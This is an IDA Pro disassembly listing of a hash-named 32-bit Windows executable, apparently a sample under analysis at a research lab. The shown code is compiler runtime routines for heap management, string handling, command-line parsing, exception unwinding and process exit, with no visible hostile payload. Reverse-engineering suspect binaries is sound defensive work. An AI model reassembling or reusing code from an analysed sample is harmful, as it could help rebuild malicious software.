;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 55435EFBCE931324C66AA91458EED1E0
; File Name : u:\work\55435efbce931324c66aa91458eed1e0_orig.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 10000000
; Section 1. (virtual address 00001000)
; Virtual size : 00006000 ( 24576.)
; Section size in file : 00005E00 ( 24064.)
; Offset to raw data for section: 00000400
; Flags 60000020: Text Executable Readable
; Alignment : default
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
CODE segment para public 'CODE' use32
assume cs:CODE
;org 10001000h
assume es:nothing, ss:nothing, ds:CODE, fs:nothing, gs:nothing
; [00000006 BYTES: COLLAPSED FUNCTION GetProcessHeap. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION HeapAlloc. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION HeapReAlloc. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION HeapFree. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION FreeLibrary. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION GetModuleFileNameA. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION GetModuleHandleA. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION LocalAlloc. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION TlsGetValue. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION TlsSetValue. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION GetCommandLineA. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION GetSystemTime. PRESS KEYPAD "+" TO EXPAND]
align 10h
loc_10001060: ; DATA XREF: sub_10001584�o
jmp ds:RaiseException
; ---------------------------------------------------------------------------
align 4
loc_10001068: ; DATA XREF: sub_10001584+A�o
jmp ds:RtlUnwind
; ---------------------------------------------------------------------------
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION CharNextA. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION ExitProcess. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION MultiByteToWideChar. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION SysAllocStringLen. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION SysFreeString. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION GetCurrentThreadId. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
sub_100010A0 proc near ; CODE XREF: sub_100010F0+4�p
; sub_10001120+3F�p
; DATA XREF: ...
push eax ; dwBytes
mov eax, ds:dwFlags
push eax ; dwFlags
mov eax, ds:hHeap
push eax ; hHeap
call HeapAlloc
retn
sub_100010A0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_100010B4 proc near ; CODE XREF: sub_10001108+4�p
; sub_10001120+26�p ...
push ebx
mov ebx, eax
push ebx ; lpMem
mov eax, ds:dwFlags
and eax, 1
push eax ; dwFlags
mov eax, ds:hHeap
push eax ; hHeap
call HeapFree
cmp eax, 1
sbb eax, eax
neg eax
and eax, 7Fh
pop ebx
retn
sub_100010B4 endp
; =============== S U B R O U T I N E =======================================
sub_100010D8 proc near ; CODE XREF: sub_10001120+D�p
; DATA XREF: DATA:off_1000703C�o
push edx ; dwBytes
push eax ; lpMem
mov eax, ds:dwFlags
and eax, 0
push eax ; dwFlags
mov eax, ds:hHeap
push eax ; hHeap
call HeapReAlloc
retn
sub_100010D8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_100010F0 proc near ; CODE XREF: sub_10001798+C�p
; sub_100031E0+4E�p ...
test eax, eax
jz short locret_100010FE
call ds:off_10007034
or eax, eax
jz short loc_100010FF
locret_100010FE: ; CODE XREF: sub_100010F0+2�j
retn
; ---------------------------------------------------------------------------
loc_100010FF: ; CODE XREF: sub_100010F0+C�j
mov al, 1
jmp loc_100011C8
sub_100010F0 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10001108 proc near ; CODE XREF: sub_100016D8+1B�p
; sub_100016FC+20�p ...
test eax, eax
jz short locret_10001116
call ds:off_10007038
or eax, eax
jnz short loc_10001117
locret_10001116: ; CODE XREF: sub_10001108+2�j
retn
; ---------------------------------------------------------------------------
loc_10001117: ; CODE XREF: sub_10001108+C�j
mov al, 2
jmp loc_100011C8
sub_10001108 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_10001120 proc near ; CODE XREF: sub_10001AB4+22�p
; FUNCTION CHUNK AT 100011C8 SIZE 0000000B BYTES
mov ecx, [eax]
test ecx, ecx
jz short loc_10001158
test edx, edx
jz short loc_10001142
push eax
mov eax, ecx
call ds:off_1000703C
pop ecx
or eax, eax
jz short loc_10001151
mov [ecx], eax
retn
; ---------------------------------------------------------------------------
loc_1000113B: ; CODE XREF: sub_10001120+2E�j
mov al, 2
jmp loc_100011C8
; ---------------------------------------------------------------------------
loc_10001142: ; CODE XREF: sub_10001120+8�j
mov [eax], edx
mov eax, ecx
call ds:off_10007038
or eax, eax
jnz short loc_1000113B
retn
; ---------------------------------------------------------------------------
loc_10001151: ; CODE XREF: sub_10001120+16�j
; sub_10001120+48�j
mov al, 1
jmp loc_100011C8
; ---------------------------------------------------------------------------
loc_10001158: ; CODE XREF: sub_10001120+4�j
test edx, edx
jz short locret_1000116C
push eax
mov eax, edx
call ds:off_10007034
pop ecx
or eax, eax
jz short loc_10001151
mov [ecx], eax
locret_1000116C: ; CODE XREF: sub_10001120+3A�j
retn
sub_10001120 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_10001170 proc near ; CODE XREF: sub_1000117C+42�p
mov ds:dword_10007004, edx
call sub_100016C0
sub_10001170 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_1000117C proc near ; CODE XREF: sub_10001120+AE�j
push ebx
push esi
mov esi, edx
mov ebx, eax
and bl, 7Fh
cmp ds:dword_10008004, 0
jz short loc_10001198
mov edx, esi
mov eax, ebx
call ds:dword_10008004
loc_10001198: ; CODE XREF: sub_1000117C+10�j
test bl, bl
jnz short loc_100011A9
call sub_10001E70
mov ebx, [eax+0]
jmp short loc_100011B8
; ---------------------------------------------------------------------------
loc_100011A9: ; CODE XREF: sub_1000117C+1E�j
cmp bl, 18h
ja short loc_100011B8
xor eax, eax
mov al, bl
mov bl, ds:byte_10007040[eax]
loc_100011B8: ; CODE XREF: sub_1000117C+2B�j
; sub_1000117C+30�j
xor eax, eax
mov al, bl
mov edx, esi
call sub_10001170
sub_1000117C endp
; ---------------------------------------------------------------------------
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_10001120
loc_100011C8: ; CODE XREF: sub_100010F0+11�j
; sub_10001108+11�j ...
and eax, 7Fh
mov edx, [esp+0]
jmp sub_1000117C
; END OF FUNCTION CHUNK FOR sub_10001120
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_100011D4 proc near ; CODE XREF: sub_1000172C+1B�p
; sub_100017C4+1C�p ...
cmp ecx, 4
jge short loc_100011F5
jcxz locret_10001233
cmp eax, edx
jz short locret_10001233
push esi
push edi
mov esi, eax
mov edi, edx
ja short loc_100011F1
lea esi, [ecx+esi-1]
lea edi, [ecx+edi-1]
std
loc_100011F1: ; CODE XREF: sub_100011D4+12�j
rep movsb
jmp short loc_10001221
; ---------------------------------------------------------------------------
loc_100011F5: ; CODE XREF: sub_100011D4+3�j
cmp eax, edx
jz short locret_10001233
push esi
push edi
mov esi, eax
mov edi, edx
mov eax, ecx
ja short loc_10001223
and ecx, 3
lea esi, [eax+esi-1]
lea edi, [eax+edi-1]
std
rep movsb
sar eax, 2
mov ecx, eax
mov eax, 3
sub esi, eax
sub edi, eax
rep movsd
loc_10001221: ; CODE XREF: sub_100011D4+1F�j
cld
dec ecx
loc_10001223: ; CODE XREF: sub_100011D4+2D�j
sar ecx, 2
js short loc_10001231
rep movsd
and eax, 3
mov ecx, eax
rep movsb
loc_10001231: ; CODE XREF: sub_100011D4+52�j
pop edi
pop esi
locret_10001233: ; CODE XREF: sub_100011D4+5�j
; sub_100011D4+A�j ...
retn
sub_100011D4 endp
; =============== S U B R O U T I N E =======================================
sub_10001234 proc near ; CODE XREF: sub_10001320+1F�p
; sub_10001320+2B�p ...
push ebx
push esi
push edi
push ebp
mov esi, edx
mov ebx, eax
jmp short loc_10001246
; ---------------------------------------------------------------------------
loc_1000123E: ; CODE XREF: sub_10001234+1A�j
push ebx ; lpsz
call CharNextA ; CharNextA
mov ebx, eax
loc_10001246: ; CODE XREF: sub_10001234+8�j
; sub_10001234+2A�j
mov al, [ebx]
test al, al
jz short loc_10001250
cmp al, 20h
jbe short loc_1000123E
loc_10001250: ; CODE XREF: sub_10001234+16�j
cmp byte ptr [ebx], 22h
jnz short loc_10001260
cmp byte ptr [ebx+1], 22h
jnz short loc_10001260
add ebx, 2
jmp short loc_10001246
; ---------------------------------------------------------------------------
loc_10001260: ; CODE XREF: sub_10001234+1F�j
; sub_10001234+25�j
xor ebp, ebp
mov edi, ebx
jmp short loc_100012A9
; ---------------------------------------------------------------------------
loc_10001266: ; CODE XREF: sub_10001234+79�j
cmp al, 22h
jnz short loc_1000129B
push ebx ; lpsz
call CharNextA ; CharNextA
mov ebx, eax
jmp short loc_10001282
; ---------------------------------------------------------------------------
loc_10001274: ; CODE XREF: sub_10001234+56�j
push ebx ; lpsz
call CharNextA ; CharNextA
mov edx, eax
sub edx, ebx
add ebp, edx
mov ebx, eax
loc_10001282: ; CODE XREF: sub_10001234+3E�j
mov al, [ebx]
test al, al
jz short loc_1000128C
cmp al, 22h
jnz short loc_10001274
loc_1000128C: ; CODE XREF: sub_10001234+52�j
cmp byte ptr [ebx], 0
jz short loc_100012A9
push ebx ; lpsz
call CharNextA ; CharNextA
mov ebx, eax
jmp short loc_100012A9
; ---------------------------------------------------------------------------
loc_1000129B: ; CODE XREF: sub_10001234+34�j
push ebx ; lpsz
call CharNextA ; CharNextA
mov edx, eax
sub edx, ebx
add ebp, edx
mov ebx, eax
loc_100012A9: ; CODE XREF: sub_10001234+30�j
; sub_10001234+5B�j ...
mov al, [ebx]
cmp al, 20h
ja short loc_10001266
mov eax, esi
mov edx, ebp
call sub_10001AB4
mov ebx, edi
mov edi, [esi]
xor esi, esi
jmp short loc_10001311
; ---------------------------------------------------------------------------
loc_100012C0: ; CODE XREF: sub_10001234+E1�j
cmp al, 22h
jnz short loc_100012FC
push ebx ; lpsz
call CharNextA ; CharNextA
mov ebx, eax
jmp short loc_100012E3
; ---------------------------------------------------------------------------
loc_100012CE: ; CODE XREF: sub_10001234+B7�j
push ebx ; lpsz
call CharNextA ; CharNextA
cmp eax, ebx
jbe short loc_100012E3
loc_100012D8: ; CODE XREF: sub_10001234+AD�j
mov dl, [ebx]
mov [edi+esi], dl
inc ebx
inc esi
cmp eax, ebx
ja short loc_100012D8
loc_100012E3: ; CODE XREF: sub_10001234+98�j
; sub_10001234+A2�j
mov al, [ebx]
test al, al
jz short loc_100012ED
cmp al, 22h
jnz short loc_100012CE
loc_100012ED: ; CODE XREF: sub_10001234+B3�j
cmp byte ptr [ebx], 0
jz short loc_10001311
push ebx ; lpsz
call CharNextA ; CharNextA
mov ebx, eax
jmp short loc_10001311
; ---------------------------------------------------------------------------
loc_100012FC: ; CODE XREF: sub_10001234+8E�j
push ebx ; lpsz
call CharNextA ; CharNextA
cmp eax, ebx
jbe short loc_10001311
loc_10001306: ; CODE XREF: sub_10001234+DB�j
mov dl, [ebx]
mov [edi+esi], dl
inc ebx
inc esi
cmp eax, ebx
ja short loc_10001306
loc_10001311: ; CODE XREF: sub_10001234+8A�j
; sub_10001234+BC�j ...
mov al, [ebx]
cmp al, 20h
ja short loc_100012C0
mov eax, ebx
pop ebp
pop edi
pop esi
pop ebx
retn
sub_10001234 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10001320 proc near ; CODE XREF: CODE:10006736�p
; CODE:loc_10006781�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0
push ebx
push esi
xor eax, eax
push ebp
push offset loc_10001371
push dword ptr fs:[eax]
mov fs:[eax], esp
xor esi, esi
call GetCommandLineA ; GetCommandLineA
lea edx, [ebp+var_4]
call sub_10001234
mov ebx, eax
loc_10001346: ; CODE XREF: sub_10001320+39�j
lea edx, [ebp+var_4]
mov eax, ebx
call sub_10001234
mov ebx, eax
cmp [ebp+var_4], 0
jz short loc_1000135B
inc esi
jmp short loc_10001346
; ---------------------------------------------------------------------------
loc_1000135B: ; CODE XREF: sub_10001320+36�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_10001378
loc_10001368: ; CODE XREF: sub_10001320+56�j
lea eax, [ebp+var_4]
call sub_100016D8
retn
; ---------------------------------------------------------------------------
loc_10001371: ; DATA XREF: sub_10001320+A�o
jmp loc_100014A8
; ---------------------------------------------------------------------------
jmp short loc_10001368
; ---------------------------------------------------------------------------
loc_10001378: ; CODE XREF: sub_10001320+50�j
; DATA XREF: sub_10001320+43�o
mov eax, esi
pop esi
pop ebx
pop ecx
pop ebp
retn
sub_10001320 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_10001380 proc near ; CODE XREF: sub_100027F8+31�p
; sub_100027F8+75�p ...
Filename = byte ptr -114h
push ebx
push esi
push edi
add esp, 0FFFFFEF8h
mov ebx, edx
mov esi, eax
mov eax, ebx
call sub_100016D8
test esi, esi
jnz short loc_100013B6
push 105h ; nSize
lea eax, [esp+118h+Filename]
push eax ; lpFilename
push 0 ; hModule
call GetModuleFileNameA ; GetModuleFileNameA
mov ecx, eax
mov edx, esp
mov eax, ebx
call sub_100017C4
jmp short loc_100013D4
; ---------------------------------------------------------------------------
loc_100013B6: ; CODE XREF: sub_10001380+16�j
call GetCommandLineA ; GetCommandLineA
mov edi, eax
loc_100013BD: ; CODE XREF: sub_10001380+52�j
mov edx, ebx
mov eax, edi
call sub_10001234
mov edi, eax
test esi, esi
jz short loc_100013D4
cmp dword ptr [ebx], 0
jz short loc_100013D4
dec esi
jmp short loc_100013BD
; ---------------------------------------------------------------------------
loc_100013D4: ; CODE XREF: sub_10001380+34�j
; sub_10001380+4A�j ...
add esp, 108h
pop edi
pop esi
pop ebx
retn
sub_10001380 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100013E0 proc near ; CODE XREF: sub_10005B8C+2D�p
SystemTime = _SYSTEMTIME ptr -18h
push ebp
mov ebp, esp
add esp, 0FFFFFFE8h
lea eax, [ebp+SystemTime]
push eax ; lpSystemTime
call GetSystemTime ; GetSystemTime
movzx eax, [ebp+SystemTime.wHour]
imul eax, 3Ch
add ax, [ebp+SystemTime.wMinute]
imul eax, 3Ch
xor edx, edx
mov dx, [ebp+SystemTime.wSecond]
add eax, edx
imul eax, 3E8h
mov dx, [ebp+SystemTime.wMilliseconds]
add eax, edx
mov ds:dword_10007008, eax
mov esp, ebp
pop ebp
retn
sub_100013E0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_1000141C proc near ; CODE XREF: sub_1000567C+53�p
mov ds:word_1000700C, ax
fnclex
fldcw ds:word_1000700C
retn
sub_1000141C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_1000142C proc near ; CODE XREF: sub_1000567C+F�p
var_4 = word ptr -4
push 0
fnstcw [esp+4+var_4]
pop eax
retn
sub_1000142C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10001434 proc near ; CODE XREF: sub_100056E0+22B�p
; sub_100056E0+247�p
var_8 = qword ptr -8
sub esp, 8
fistp [esp+8+var_8]
wait
pop eax
pop edx
retn
sub_10001434 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_10001440 proc near ; CODE XREF: sub_10001FA4+2�p
; sub_1000292C+AD�p ...
push edi
mov edi, eax
mov ch, cl
mov eax, ecx
shl eax, 10h
mov ax, cx
mov ecx, edx
sar ecx, 2
js short loc_1000145D
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
loc_1000145D: ; CODE XREF: sub_10001440+12�j
pop edi
retn
sub_10001440 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_10001460 proc near ; CODE XREF: sub_10001480+C�p
test ecx, ecx
jz short locret_1000147D
mov eax, [ecx+1]
cmp byte ptr [ecx], 0E9h
jz short loc_10001478
cmp byte ptr [ecx], 0EBh
jnz short locret_1000147D
movsx eax, al
inc ecx
inc ecx
jmp short loc_1000147B
; ---------------------------------------------------------------------------
loc_10001478: ; CODE XREF: sub_10001460+A�j
add ecx, 5
loc_1000147B: ; CODE XREF: sub_10001460+16�j
add ecx, eax
locret_1000147D: ; CODE XREF: sub_10001460+2�j
; sub_10001460+F�j
retn
sub_10001460 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_10001480 proc near ; CODE XREF: sub_100031E0-1D13�p
cmp ds:byte_10007010, 1
jbe short locret_100014A6
push eax
push edx
push ecx
call sub_10001460
push ecx
push esp
push 1
push 0
push 0EEDFAE1h
call ds:dword_10008008
pop ecx
pop ecx
pop edx
pop eax
locret_100014A6: ; CODE XREF: sub_10001480+7�j
retn
sub_10001480 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_100031E0
loc_100014A8: ; CODE XREF: sub_10001320:loc_10001371�j
; CODE:loc_10001D8F�j ...
mov eax, [esp-4+arg_0]
mov edx, [esp-4+arg_4]
test dword ptr [eax+4], 6
jz short loc_100014D8
mov ecx, [edx+4]
mov dword ptr [edx+4], offset loc_100014D8
push ebx
push esi
push edi
push ebp
mov ebp, [edx+8]
add ecx, 5
call sub_10001480
call ecx
pop ebp
pop edi
pop esi
pop ebx
loc_100014D8: ; CODE XREF: sub_100031E0-1D29�j
; DATA XREF: sub_100031E0-1D24�o
mov eax, 1
retn
; END OF FUNCTION CHUNK FOR sub_100031E0
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_100014E0 proc near ; CODE XREF: sub_100015F0:loc_1000163E�p
; DATA XREF: DATA:off_10007024�o
push ebx
push esi
push edi
push ebp
mov edi, offset dword_10008590
mov eax, [edi+8]
test eax, eax
jz short loc_1000150E
mov ebx, [edi+0Ch]
mov esi, [eax+4]
test ebx, ebx
jle short loc_1000150E
loc_100014FA: ; CODE XREF: sub_100014E0+2C�j
dec ebx
mov [edi+0Ch], ebx
mov eax, [esi+ebx*8+4]
test eax, eax
jz short loc_1000150A
mov ebp, eax
call ebp
loc_1000150A: ; CODE XREF: sub_100014E0+24�j
test ebx, ebx
jg short loc_100014FA
loc_1000150E: ; CODE XREF: sub_100014E0+E�j
; sub_100014E0+18�j
pop ebp
pop edi
pop esi
pop ebx
retn
sub_100014E0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10001514 proc near ; CODE XREF: sub_10001514+43�p
; sub_10001568+12�p
; DATA XREF: ...
push ebx
push esi
push edi
push ebp
mov edi, ecx
mov ebp, edx
mov esi, eax
mov eax, offset sub_10001514
cmp eax, ds:off_10007020
setz bl
cmp edi, ebp
jle short loc_10001563
loc_10001530: ; CODE XREF: sub_10001514+4D�j
mov eax, [esi+ebp*8]
inc ebp
mov ds:dword_1000859C, ebp
test eax, eax
jz short loc_10001540
call eax
loc_10001540: ; CODE XREF: sub_10001514+28�j
test bl, bl
jz short loc_1000155F
mov eax, offset sub_10001514
cmp eax, ds:off_10007020
jz short loc_1000155F
mov ecx, edi
mov edx, ebp
mov eax, esi
call ds:off_10007020
jmp short loc_10001563
; ---------------------------------------------------------------------------
loc_1000155F: ; CODE XREF: sub_10001514+2E�j
; sub_10001514+3B�j
cmp edi, ebp
jg short loc_10001530
loc_10001563: ; CODE XREF: sub_10001514+1A�j
; sub_10001514+49�j
pop ebp
pop edi
pop esi
pop ebx
retn
sub_10001514 endp
; =============== S U B R O U T I N E =======================================
sub_10001568 proc near ; CODE XREF: sub_10001584+35�p
mov eax, ds:dword_10008598
test eax, eax
jz short locret_10001580
mov edx, [eax]
xor ecx, ecx
mov eax, [eax+4]
xchg ecx, edx
call ds:off_10007020
locret_10001580: ; CODE XREF: sub_10001568+7�j
retn
sub_10001568 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10001584 proc near ; CODE XREF: sub_10001EBC+3A�p
mov ds:dword_10008008, offset loc_10001060
mov ds:dword_1000800C, offset loc_10001068
mov ds:dword_10008598, eax
xor eax, eax
mov ds:dword_1000859C, eax
mov ds:dword_100085A0, edx
mov eax, [edx+4]
mov ds:dword_10008014, eax
mov ds:byte_1000801C, 0
call sub_10001568
retn
sub_10001584 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_100015C0 proc near ; CODE XREF: sub_100015F0+96�p
xor eax, eax
xchg eax, ds:dword_10007000
neg eax
sbb eax, eax
inc eax
mov edi, offset dword_10008590
mov ebx, [edi+18h]
mov ebp, [edi+14h]
push dword ptr [edi+1Ch]
push dword ptr [edi+20h]
mov esi, [edi]
mov ecx, 0Bh
rep movsd
pop edi
pop esi
leave
retn 0Ch
sub_100015C0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_100015F0 proc near ; CODE XREF: sub_100016C0+5�p
; CODE:loc_10006C37�p
push ebx
push esi
push edi
push ebp
mov ebx, offset dword_10008590
mov esi, offset dword_10007000
mov edi, offset dword_10008020
cmp byte ptr [ebx+28h], 0
jnz short loc_1000161F
cmp dword ptr [edi], 0
jz short loc_1000161F
loc_1000160E: ; CODE XREF: sub_100015F0+2D�j
mov edx, [edi]
mov eax, edx
xor edx, edx
mov [edi], edx
mov ebp, eax
call ebp
cmp dword ptr [edi], 0
jnz short loc_1000160E
loc_1000161F: ; CODE XREF: sub_100015F0+17�j
; sub_100015F0+1C�j
cmp ds:dword_10007004, 0
jz short loc_1000162E
call ds:off_1000705C
loc_1000162E: ; CODE XREF: sub_100015F0+36�j
; sub_100015F0+C6�j
cmp byte ptr [ebx+28h], 2
jnz short loc_1000163E
cmp dword ptr [esi], 0
jnz short loc_1000163E
xor eax, eax
mov [ebx+0Ch], eax
loc_1000163E: ; CODE XREF: sub_100015F0+42�j
; sub_100015F0+47�j
call ds:off_10007024
cmp byte ptr [ebx+28h], 1
jbe short loc_1000164F
cmp dword ptr [esi], 0
jz short loc_10001671
loc_1000164F: ; CODE XREF: sub_100015F0+58�j
mov eax, [ebx+10h]
test eax, eax
jz short loc_10001671
call ds:off_1000701C
mov edx, [ebx+10h]
mov eax, [edx+10h]
cmp eax, [edx+4]
jz short loc_10001671
test eax, eax
jz short loc_10001671
push eax ; hLibModule
call FreeLibrary ; FreeLibrary
loc_10001671: ; CODE XREF: sub_100015F0+5D�j
; sub_100015F0+64�j ...
call ds:off_10007028
cmp byte ptr [ebx+28h], 1
jnz short loc_10001680
call dword ptr [ebx+24h]
loc_10001680: ; CODE XREF: sub_100015F0+8B�j
cmp byte ptr [ebx+28h], 0
jz short loc_1000168B
call sub_100015C0
loc_1000168B: ; CODE XREF: sub_100015F0+94�j
cmp dword ptr [ebx], 0
jnz short loc_100016A7
cmp ds:dword_10008010, 0
jz short loc_1000169F
call ds:dword_10008010
loc_1000169F: ; CODE XREF: sub_100015F0+A7�j
mov eax, [esi]
push eax ; uExitCode
call ExitProcess ; ExitProcess
; ---------------------------------------------------------------------------
loc_100016A7: ; CODE XREF: sub_100015F0+9E�j
mov eax, [ebx]
push esi
mov esi, eax
mov edi, ebx
mov ecx, 0Bh
rep movsd
pop esi
jmp loc_1000162E
sub_100015F0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
pop ebp
pop edi
pop esi
pop ebx
retn
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_100016C0 proc near ; CODE XREF: sub_10001170+6�p
; sub_100016CC+6�j
mov ds:dword_10007000, eax
call sub_100015F0
sub_100016C0 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_100016CC proc near ; CODE XREF: sub_10001E2C+1A�p
; sub_10001E2C+2F�p
pop ds:dword_10007004
jmp sub_100016C0
sub_100016CC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_100016D8 proc near ; CODE XREF: sub_10001320+4B�p
; sub_10001380+F�p ...
mov edx, [eax]
test edx, edx
jz short locret_100016F9
mov dword ptr [eax], 0
mov ecx, [edx-8]
dec ecx
jl short locret_100016F9
dec dword ptr [edx-8]
jnz short locret_100016F9
push eax
lea eax, [edx-8]
call sub_10001108
pop eax
locret_100016F9: ; CODE XREF: sub_100016D8+4�j
; sub_100016D8+10�j ...
retn
sub_100016D8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_100016FC proc near ; CODE XREF: sub_100027F8+CA�p
; sub_1000292C+3F6�p ...
push ebx
push esi
mov ebx, eax
mov esi, edx
loc_10001702: ; CODE XREF: sub_100016FC+29�j
mov edx, [ebx]
test edx, edx
jz short loc_10001721
mov dword ptr [ebx], 0
mov ecx, [edx-8]
dec ecx
jl short loc_10001721
dec dword ptr [edx-8]
jnz short loc_10001721
lea eax, [edx-8]
call sub_10001108
loc_10001721: ; CODE XREF: sub_100016FC+A�j
; sub_100016FC+16�j ...
add ebx, 4
dec esi
jnz short loc_10001702
pop esi
pop ebx
retn
sub_100016FC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_1000172C proc near ; CODE XREF: sub_1000185C+8�j
; sub_100018A0:loc_10001911�p ...
test edx, edx
jz short loc_10001753
mov ecx, [edx-8]
inc ecx
jg short loc_10001750
push eax
push edx
mov eax, [edx-4]
call sub_10001798
mov edx, eax
pop eax
push edx
mov ecx, [eax-4]
call sub_100011D4
pop edx
pop eax
jmp short loc_10001753
; ---------------------------------------------------------------------------
loc_10001750: ; CODE XREF: sub_1000172C+8�j
inc dword ptr [edx-8]
loc_10001753: ; CODE XREF: sub_1000172C+2�j
; sub_1000172C+22�j
xchg edx, [eax]
test edx, edx
jz short locret_1000176C
mov ecx, [edx-8]
dec ecx
jl short locret_1000176C
dec dword ptr [edx-8]
jnz short locret_1000176C
lea eax, [edx-8]
call sub_10001108
locret_1000176C: ; CODE XREF: sub_1000172C+2B�j
; sub_1000172C+31�j ...
retn
sub_1000172C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_10001770 proc near ; CODE XREF: sub_10004540+80�p
test edx, edx
jz short loc_1000177D
mov ecx, [edx-8]
inc ecx
jle short loc_1000177D
inc dword ptr [edx-8]
loc_1000177D: ; CODE XREF: sub_10001770+2�j
; sub_10001770+8�j
xchg edx, [eax]
test edx, edx
jz short locret_10001796
mov ecx, [edx-8]
dec ecx
jl short locret_10001796
dec dword ptr [edx-8]
jnz short locret_10001796
lea eax, [edx-8]
call sub_10001108
locret_10001796: ; CODE XREF: sub_10001770+11�j
; sub_10001770+17�j ...
retn
sub_10001770 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_10001798 proc near ; CODE XREF: sub_1000172C+F�p
; sub_100017C4+B�p ...
test eax, eax
jle short loc_100017C0
push eax
add eax, 0Ah
and eax, 0FFFFFFFEh
push eax
call sub_100010F0
pop edx
mov word ptr [edx+eax-2], 0
add eax, 8
pop edx
mov [eax-4], edx
mov dword ptr [eax-8], 1
retn
; ---------------------------------------------------------------------------
loc_100017C0: ; CODE XREF: sub_10001798+2�j
xor eax, eax
retn
sub_10001798 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_100017C4 proc near ; CODE XREF: sub_10001380+2F�p
; sub_1000180C:loc_10001833�j ...
push ebx
push esi
push edi
mov ebx, eax
mov esi, edx
mov edi, ecx
mov eax, edi
call sub_10001798
mov ecx, edi
